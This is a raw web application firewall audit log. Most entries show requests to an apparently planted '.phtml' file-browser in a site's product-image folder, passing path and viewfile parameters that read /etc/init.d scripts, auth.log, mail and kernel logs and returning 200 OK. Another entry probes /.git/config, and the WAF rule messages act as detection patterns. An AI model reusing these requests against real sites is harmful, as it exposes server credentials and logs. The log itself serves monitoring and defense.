[msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5uy5oX9bs_jrDBLBFkJQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks-early"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5uy5oX9bs_jrDBLBFkJQAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970635798771 4207 (- - -) Stopwatch2: 1749970635798771 4207; combined=2401, p1=339, p2=1906, p3=37, p4=34, p5=85, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2832703d-Z-- --cf159060-A-- [15/Jun/2025:12:27:51.713487 +0530] aE5u77axs8_oWLL8MgpCZgAAAAY 54.84.169.196 37506 127.0.0.1 7081 --cf159060-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/grub-common HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.84.169.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cf159060-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3441 Connection: close Content-Type: text/html; charset=UTF-8 --cf159060-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5u77axs8_oWLL8MgpCZgAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/grub-common"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5u77axs8_oWLL8MgpCZgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970671709124 4415 (- - -) Stopwatch2: 1749970671709124 4415; combined=2262, p1=370, p2=1727, p3=38, p4=35, p5=91, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf159060-Z-- --6a04097e-A-- [15/Jun/2025:12:28:23.818134 +0530] aE5vD3xTls_n68HhJPDU9wAAAAE 44.205.180.155 47382 127.0.0.1 7081 --6a04097e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.205.180.155 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --6a04097e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --6a04097e-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vD3xTls_n68HhJPDU9wAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970703813990 4195 (- - -) Stopwatch2: 1749970703813990 4195; combined=2303, p1=336, p2=1844, p3=36, p4=32, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a04097e-Z-- --87e3b503-A-- [15/Jun/2025:12:28:28.752898 +0530] aE5vFD8QAuiw8zL7QHNvvQAAAAU 23.21.179.120 47510 127.0.0.1 7081 --87e3b503-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/mail.err.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.21.179.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --87e3b503-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --87e3b503-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vFD8QAuiw8zL7QHNvvQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970708749111 3847 (- - -) Stopwatch2: 1749970708749111 3847; combined=1985, p1=355, p2=1505, p3=34, p4=34, p5=56, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87e3b503-Z-- --38f4394c-A-- [15/Jun/2025:12:28:42.412752 +0530] aE5vIA2pbpddt_O7FYy-0AAAAAc 161.35.56.0 40364 127.0.0.1 7081 --38f4394c-B-- GET /.git/config HTTP/1.0 Host: www.home9ine.com X-Real-IP: 161.35.56.0 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --38f4394c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Set-Cookie: _sfs_id=6032d2c37359174d28ca3717f24bfceb1749970721; expires=Sun, 15 Jun 2025 07:58:41 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --38f4394c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.home9ine.com"] [uri "/.git/config"] [unique_id "aE5vIA2pbpddt_O7FYy-0AAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749970720652066 1760750 (- - -) Stopwatch2: 1749970720652066 1760750; combined=1960, p1=486, p2=1385, p3=0, p4=0, p5=89, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38f4394c-Z-- --01ba1f55-A-- [15/Jun/2025:12:29:29.878044 +0530] aE5vUQ2pbpddt_O7FYy-5wAAAAc 216.73.216.83 56724 127.0.0.1 7081 --01ba1f55-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmail.err.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --01ba1f55-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2945 Connection: close Content-Type: text/html; charset=UTF-8 --01ba1f55-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vUQ2pbpddt_O7FYy-5wAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970769874174 3933 (- - -) Stopwatch2: 1749970769874174 3933; combined=2066, p1=361, p2=1583, p3=34, p4=33, p5=55, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01ba1f55-Z-- --0c4ab074-A-- [15/Jun/2025:12:29:31.783556 +0530] aE5vUz8QAuiw8zL7QHNv2gAAAAU 216.73.216.83 56902 127.0.0.1 7081 --0c4ab074-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fauth.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0c4ab074-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2942 Connection: close Content-Type: text/html; charset=UTF-8 --0c4ab074-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vUz8QAuiw8zL7QHNv2gAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970771779614 3996 (- - -) Stopwatch2: 1749970771779614 3996; combined=2160, p1=382, p2=1646, p3=39, p4=35, p5=58, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c4ab074-Z-- --2b63cd43-A-- [15/Jun/2025:12:29:31.912273 +0530] aE5vU7uLyDaLfLFz1OBTBQAAAAs 216.73.216.83 56918 127.0.0.1 7081 --2b63cd43-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmaillog.processed HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2b63cd43-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --2b63cd43-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vU7uLyDaLfLFz1OBTBQAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970771908261 4071 (- - -) Stopwatch2: 1749970771908261 4071; combined=2063, p1=397, p2=1542, p3=35, p4=34, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b63cd43-Z-- --c099b543-A-- [15/Jun/2025:12:29:32.428518 +0530] aE5vVJoX9bs_jrDBLBFkZwAAAAA 216.73.216.83 56978 127.0.0.1 7081 --c099b543-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fauth.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c099b543-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --c099b543-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vVJoX9bs_jrDBLBFkZwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970772424768 3803 (- - -) Stopwatch2: 1749970772424768 3803; combined=2024, p1=347, p2=1509, p3=32, p4=31, p5=105, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c099b543-Z-- --766f6d7c-A-- [15/Jun/2025:12:30:11.504175 +0530] aE5ve3xTls_n68HhJPDVNQAAAAE 216.73.216.83 57706 127.0.0.1 7081 --766f6d7c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fauth.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --766f6d7c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --766f6d7c-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5ve3xTls_n68HhJPDVNQAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970811501053 3185 (- - -) Stopwatch2: 1749970811501053 3185; combined=1654, p1=272, p2=1255, p3=35, p4=35, p5=57, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --766f6d7c-Z-- --1ec15d7f-A-- [15/Jun/2025:12:30:12.327438 +0530] aE5vfBBbAfjIOuFq7fosiwAAAAw 216.73.216.83 57858 127.0.0.1 7081 --1ec15d7f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fauth.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1ec15d7f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --1ec15d7f-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vfBBbAfjIOuFq7fosiwAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970812323484 4008 (- - -) Stopwatch2: 1749970812323484 4008; combined=2132, p1=343, p2=1661, p3=33, p4=36, p5=59, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ec15d7f-Z-- --6c301e06-A-- [15/Jun/2025:12:30:12.536399 +0530] aE5vfHxTls_n68HhJPDVNwAAAAE 216.73.216.83 57862 127.0.0.1 7081 --6c301e06-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fmaillog HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6c301e06-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2942 Connection: close Content-Type: text/html; charset=UTF-8 --6c301e06-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vfHxTls_n68HhJPDVNwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970812532460 4021 (- - -) Stopwatch2: 1749970812532460 4021; combined=2136, p1=356, p2=1658, p3=34, p4=32, p5=56, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c301e06-Z-- --fa5eba6d-A-- [15/Jun/2025:12:30:12.737253 +0530] aE5vfJX6T5jLdIl-tq4z4QAAAAM 216.73.216.83 57886 127.0.0.1 7081 --fa5eba6d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2Fvar%2Flog&viewfile=%2Fvar%2Flog%2Fkern.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fa5eba6d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2945 Connection: close Content-Type: text/html; charset=UTF-8 --fa5eba6d-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5vfJX6T5jLdIl-tq4z4QAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749970812731645 5677 (- - -) Stopwatch2: 1749970812731645 5677; combined=3027, p1=444, p2=2418, p3=48, p4=45, p5=72, sr=121, sw=0, l=0, gc=0 